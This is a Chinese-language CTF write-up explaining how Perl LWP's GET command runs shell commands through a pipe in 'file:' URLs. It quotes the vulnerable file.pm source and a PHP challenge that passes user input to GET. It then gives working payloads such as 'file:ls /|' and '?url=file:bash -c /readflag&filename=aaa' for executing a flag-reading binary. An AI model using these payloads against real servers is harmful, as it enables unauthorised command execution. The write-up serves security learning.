GET命令执行漏洞

GET命令执行漏洞

GET命令执行漏洞的原理

GET对协议处理部分调用的是/usr/share/perl5/LWP/Protocol下的各个pm模块,而在file.pm中,发现path参数是可控的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
...
# URL OK, look at file
my $path  = $url->file;

# test file exists and is readable
#第47行
    # test file exists and is readable
    unless (-e $path) {
    return HTTP::Response->new( &HTTP::Status::RC_NOT_FOUND,
                  "File `$path' does not exist");
    }
    unless (-r _) {
    return HTTP::Response->new( &HTTP::Status::RC_FORBIDDEN,
                  'User does not have read permission');
    }
...
#第127行
    # read the file
    if ($method ne "HEAD") {
    open(F, $path) or return new
        HTTP::Response(&HTTP::Status::RC_INTERNAL_SERVER_ERROR,
               "Cannot read file '$path': $!");
    binmode(F);
    $response =  $self->collect($arg, $response, sub {
        my $content = "";
        my $bytes = sysread(F, $content, $size);
        return \$content if $bytes > 0;
        return \ "";
    });
    close(F);
    }

从源码中,我们可以看出,使用GET命令时,如果文件存在的话,则会调用open()函数,对文件进行读取或对命令进行执行,因此我们可以在本地测试

1
GET 'file:ls /|'

发现可以显示目录信息,其中管道符必须要加,不然的话无法创建文件,但是在本地测试的时候,发现这个命令不可以使用,可以使用

1
GET '/'

来显示目录信息,听说是底层逻辑的问题,而读取文件的话,可以使用

1
GET 'file:bash -c /flag.txt|'

就可以显示文件的内容,而使用/flag.txt的话,服务器会在根目录下创建这个文件,而不是在网站的那个目录,所以无法使用命令执行,所以可以使用bash -c来代替.,即bash -c /flag.txt就等于./flag.txt,但是还是会出现上面的问题,在本地测试时,文件内容无法显示,但使用

1
GET './flag.txt'

可以显示文件的内容

实例

打开页面,可以看见源码

1
2
3
4
5
6
7
8
9
10
11
12
<?php 
    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); 
    @mkdir($sandbox); 
    @chdir($sandbox); 

    $data = shell_exec("GET " . escapeshellarg($_GET["url"])); 
    $info = pathinfo($_GET["filename"]); 
    $dir  = str_replace(".", "", basename($info["dirname"])); 
    @mkdir($dir); 
    @chdir($dir); 
    @file_put_contents(basename($info["basename"]), $data); 
    highlight_file(__FILE__);

从源码中,我们可以分析到

1
$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);

这串代码是将ip地址和orange结合在一起,然后进行md5加密,因此,我们可以写一个exp来获得文件存储的目录

1
2
3
4
<?php

echo md5("orange".ip地址);
?>

然后这串代码

1
2
@mkdir($sandbox)
@chdir($sandbox)

就是创建$sandbox的目录,然后改变当前目录到$sandbox中

然后对url参数输入的值,执行GET命令

1
$data = shell_exec("GET " . escapeshellarg($_GET["url"]));

pathinfo()函数

pathinfo()函数以数组的形式返回关于文件路径信息

代码

1
2
3
4
<?php

print_r(pathinfo("bash -c /readflag|"));
?>

输出结果为

1
2
3
4
5
6
Array
(
    [dirname] => bash -c
    [basename] => readflag|
    [filename] => readflag|
)

由于bash -c相当于当前目录,即.

1
2
@mkdir($dir);
@chdir($dir);

所以这串代码没什么作用,最后这串代码

1
@file_put_contents(basename($info["basename"]), $data);

就是将$data,就是GET命令执行后的内容写在$info[basename]文件中,而这个文件就在/sandbox/md5(“orange”.ip)/目录下,所以我们可以先读取目录信息

1
?url=/&filename=aaa

然后访问

1
http://url/sandbox/md5("orange".ip)/aaa

即可得到目录信息,然后我们可以看见readflag和flag,我们可以读取readflag来读取flag出来,因为目录下如果没有readflag的话是无法读取的,所以以防万一,我们可以先创建readflag文件

1
?url=&filename=bash -c /readflag

来创建bash -c /readflag,即./readflag,就是在本目录下创建readflag文件
然后使用

1
?url=file:bash -c /readflag&filename=aaa

来用GET命令来执行./readflag,并将内容放入aaa文件中,所以我们可以通过访问

1
http://url/sandbox/md5("orange".ip)/aaa

来读取flag

参考文章:[https://blog.csdn.net/qq_45521281/article/details/105868449]

[https://www.freesion.com/article/1523820728/]